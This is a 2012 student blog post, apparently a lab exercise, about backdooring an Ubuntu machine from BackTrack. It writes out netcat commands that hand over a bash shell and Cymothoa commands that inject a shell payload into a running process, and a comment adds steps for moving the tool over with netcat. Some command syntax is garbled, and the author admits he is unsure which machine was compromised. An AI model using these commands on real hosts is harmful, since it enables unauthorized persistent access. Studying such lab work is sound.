Tuesday, January 31, 2012

Backdooring Backtrack to Ubuntu

In this case is situatuation we have access to setup backdoor to victim, I type
nc -l -v -p 8888 -e > cy /bin/bash
in Backtrack terminal with position at
root@bt:/pentest/backdoors/cymothoa#
And move to terminal victim target and type
:~$ nc 192.168.56.1 8888 -e > cy /bin/bash
and look what happend in backtrack console

Position backtrack has listening and connect to victim
and I move to victim console
I type ls to look list at this directory and I execute cymothoa file with command ./cymothoa
I have running cymothoa in victim terminal, I suppose I can to next treat to setup backdoor at this console, and this is my opinion.


After enterance in cymothoa I type
ps -axu
to look prosess running

And runing cymothoa with syntax
./cymothoa -p (process ID of bash shell) -s 0 (option for bash shell) -y (port in listing on backtrack)
./cymothoa -p 20575 -s 0 -y 8888
Already infected on shell prosess.

But I still confused with this condition, I suppose this is backtrack infected by Uubuntu!? or Ubuntu already infected by BacktrackCymothoa!?
Posted by at 1/31/2012 03:10:00 AM
Labels:

1 comment:

  1. mrpJanuary 31, 2012 at 8:28 AM

    It's your backtrack hacked by the victim. It suppose like this

    you copy the cymothoa from BT to victim using nc, here the hint "transfer file with nc". after you successfully transfer cymothoa to victim, now run nc again to connect fom BT to victim, and execute the cymothoa, now you already have 3 ways, normal login, nc and cymothoa. good luck!

    ReplyDelete

Subscribe to: Post Comments (Atom)
 
IS2C © 2012 Blog's Student | is2c